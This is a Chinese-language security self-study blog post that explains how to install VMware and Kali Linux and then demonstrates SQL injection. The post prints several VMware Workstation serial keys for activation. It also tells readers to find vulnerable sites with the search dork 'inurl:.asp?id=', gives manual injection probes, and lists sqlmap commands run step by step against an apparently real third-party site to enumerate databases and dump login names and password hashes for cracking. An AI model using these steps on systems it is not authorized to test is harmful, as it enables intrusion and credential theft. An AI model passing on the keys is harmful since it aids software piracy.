这是做者的系列网络安全自学教程,主要是关于网安工具和实践操做的在线笔记,特分享出来与博友共勉,但愿您们喜欢,一块儿进步。前文分享了Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具,社会工程学中的IP物理位置定位、IP获取、收集查找,机器学习是如何运用到恶意代码攻击中的。这篇文章做者将带领你们认识Kali,事实上,Kali还是安全专家手头的重要工具集。php
Kali 是基于Debian的Linux发行版,其目的是为了设计一个实用的工具包,里面尽量多的包含渗透和审计工具(600多个)。它最早由Offensive Security的Mati Aharoni和Devon Kearns经过重写BackTrack来完成。目前,Kali Linux在渗透测试和白帽子方面是业界领先的Linux发行版,它把大多数作安全测试的开源工具都囊括在内,包括Nmap 、Wireshark 、John the Ripper、Sqlmap等。用户可经过硬盘、live CD或live USB运行Kali Linux。html
Kali的优点包括永久开源免费、支持多种无线网卡、定制内核支持无限注入、支持手机\PAD\ARM平台、高度可定制、更新频繁涵盖最新内核和软件等。使用Kali的人员涉及渗透测试者、安全审计者、安全研究者、电子取证者、逆向工程师、黑客(白帽子、灰帽子、红帽子、黑帽子)等。提醒一句,因为Kali采用Root登陆,会带来必定安全风险,它毕竟是攻击工具,而不是防护工具,学习安全的同窗,仍是很值得学习它的。linux
百度网盘:https://pan.baidu.com/s/1dsunH8EmOB_tlHYXXguOeA 提取码:izebgit
PS:这篇文章很是基础,做为小白的做者,也将继续深刻学习网络安全和系统安全相关知识并分享相关实验。但愿对初学者有帮助,大神请飘过,谢谢各位看官!github
下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
百度网盘:web
前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登陆加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向破解
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码算法
前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差别备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包sql
参考文献:
《安全之路Web渗透技术及实战案例解析》陈小兵老师
《THE ART OF DECEPTION》 By:KEVIN D.MITNICK
在你开始使用 Kali Linux 以前必须知道的事情 - LCTT MjSeve大神
史上最详细的kali安装教程没有之一 - 简书大神Sn1per
百度百科 - Kali
最新超详细虚拟机VMware安装Kali Linux - 隐秀大神
迈出黑客第一步, 安装配置Kali虚拟机 - 木子昭大神
http://cati.nwupl.edu.cn/fkzx/
网易云课程 - Kali Linux入门教程 白帽学苑老师
https://study.163.com/course/courseLearn.htm?courseId=1004016002
Sqlmap的使用详解 - 谢公子大神数据库
声明:本人坚定反对利用社会工程学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络须要咱们共同维护,更推荐你们了解它们背后的原理,更好地进行防御。浏览器
1.首先须要下载VMware虚拟机,并对其进行安装。下载地址:https://www.vmware.com/cn.html
2.选择合适的版本进行下载,做者这里安装的版本为“VMware-workstation-full-12.5.2-4638234.ext”,而且上传至百度云分享给你们。
3.双击EXE文件,开始进行安装。
4.安装完成以后输入序列号激活。
5A02H-AU243-TZJ49-GTC7K-3C61N VF5XA-FNDDJ-085GZ-4NXZ9-N20E6 UC5MR-8NE16-H81WY-R7QGV-QG2D8 ZG1WH-ATY96-H80QP-X7PEX-Y30V4 AA3E0-0VDE1-0893Z-KGZ59-QGAVF
5.运行VMware软件以下图所示,接下来须要进行第二部分的Kali配置。
1.去Kali官网Downloads页面下载64位Kali Linux的torrent文件,再经过迅雷下载。下载地址:https://www.kali.org/downloads/,做者百度云网盘已上传。
2.下载成功后,新建虚拟机,选择“自定义”设置。
3.导入下载好的Kali Linux镜像文件,选择操做系统为Linux。
4.输入虚拟机的名称和安装位置。
5.设置内存分配大小,建议不要超过提示的最大内存推荐。
6.接着点击下一步,包括。
7.选择磁盘容量大小,建议比分配容量大些,并设为。
8.建立完成以后,以下图所示。
1.开启虚拟机,进入安装界面,以下图所示,点击“开启此虚拟机”。
2.选择安装方式为“Graphical install”。
3.选择语言“中文简体”和地区“中国”,点击“继续”按钮安装。
4.自定义主机名,默认为“kali”,域名直接跳过便可。
5.设置用户密码,这是相似于Windows的开机密码,接着安装。
6.设置磁盘分区。
7.接着接续安装。
8.在询问是否要选择网络镜像时,若是你的网络很好能够选择是,这里我选择否。
下面这个GRUB安装至硬盘要选择“是”!
9.安装成功以后,等待系统重启即安装完成。
10.最终界面以下图所示。
Kali其余设置包括分辨率、中文输入、全屏显示等,请同窗们自行百度学习。
1.信息收集
2.漏洞分析
3.Web程序
4.数据库评估软件
5.密码攻击
6.无线攻击
7.逆向工程
8.漏洞利用工具集
9.嗅探/欺骗
10.权限维护
11.数字取证
12.报告工具集
13.Social Engineering Tools
打开某个软件,以下图所示。
下面做者结合Sqlmap简单讲述一个Kali环境中的实战案例。
Web漏洞包括网站自己漏洞、软件漏洞、服务器漏洞、外部攻击等,其拿站的基本方法包括通用型、SQL注入、DDoS、XXS跨站、越权漏洞、旁站注入、CSRF跨站请求、上传漏洞、支付漏洞等。
Sqlmap 是一款很是强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,经过外部链接访问数据库底层文件系统和操做系统,并执行命令实现渗透。
Sqlmap的基本流程以下:
做者原本想以“实验吧”的CTF题目做为测试地址(http://ctf5.shiyanbar.com/8/index.php?id=1),但最近它维修中,没法访问;但使用“inurl:.asp?id=”未能搜索到目标网站。但愿读者后续尝试“实验吧”的那个例子,或者自行搭建本地网站环境进行SQL注入学习。
第一步:寻找目标网站,经过浏览器“inurl:.asp?id=”搜索,寻找存在SQL注入漏洞的目标,能够先尝试手工注入判断。
判断注入点的方法不少,好比show.asp?code=115’ 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。
(1) http://xxxxx/show.asp?code=115’ and 1=1 – (正常显示)
对应的SQL语句:
select … from table where code=‘115’ and 1=1 – and xxxx;
单引号(’)匹配code='115,而后and链接,1=1恒成立,注释(–)掉后面语句。
(2) http://xxxxx/show.asp?code=115’ and 1=2 – (错误显示)
对应的SQL语句:
select … from table where code=‘115’ and 1=2 – and xxxx;
单引号(’)匹配code='115,而后and链接,1=2恒错误,注释(–)掉后面语句。
但不少网站都会有防火墙,防止SQL注入,以下图所示。
第二步:打开Kali环境中的Sqlmap环境,以下图所示。(后续采用以前的文章进行讲解,也但愿读者本身尝试下)
第三步:获取全部数据库。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --dbs
运行结果以下图所示,获取9个数据库,其中–dbs参数表示databases。
第四步:获取当前数据库。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-db
运行结果以下图所示,获取9个数据库。其中–current-db参数表示当前数据库,至关于前文MSSQL的db_name()获取数据库字段。输出结果:akykd_new。
第五步:获取数据库当前用户。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user
运行结果以下图所示,获取当前数据库用户sa。
第六步:获取数据库全部用户和密码。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords
运行结果以下图所示,获取数据库用户和密码。
第七步:获取数据库全部表。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new --tables
运行结果以下图所示,获取数据库ahykd_new的全部表,其中-D表示数据库,–tables表示全部表。
经过人为猜解,知道登陆表位usr。
第八步:获取数据库登陆表全部字段。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr --columns
运行结果以下图所示,获取数据库ahykd_new的登陆表usr全部字段,其中-D表示数据库,-T表示表,–columns表示usr表全部列。
是否是感受到了SQLMAP的强大,其中用户名usr_name、密码passwd。
第九步:获取数据库登陆表用户名和密码。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name,password" --dump
获取数据库ahykd_new的登陆表usr全部字段,其中-D表示数据库,-T表示表,-C表示输出字段(usr_name、passwd),–dump输出全部值。
若是字段内容太多,能够设置输出个数,如10个用户名和密码。
参数:-D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump
正常的输出结果例以下图所示,再经过md5解密便可。
又忙了16个小时,发现本身网络安全方向的基础很是薄弱,有太多实践知识想学,太多学术论文想看,天天都在忙碌,过程很是艰辛,博士哪有这么好毕业。可是这种苦中带甜,充实的滋味又让我陶醉,还有远方的女神、许多朋友和博友的陪伴。但愿将来在网络态势感知、恶意代码检测、嫌疑识别和知识图谱方面能再深刻点,多读文献,多找创新,加油。
天行健,君子以自强不息。
地势坤,君子以厚德载物。
最后但愿基础性文章对您有所帮助,做者也是这个领域的菜鸟一枚,但愿与您共同进步,共勉。
(By:Eastmount 2019-0919 晚上11点 http://blog.csdn.net/eastmount/ )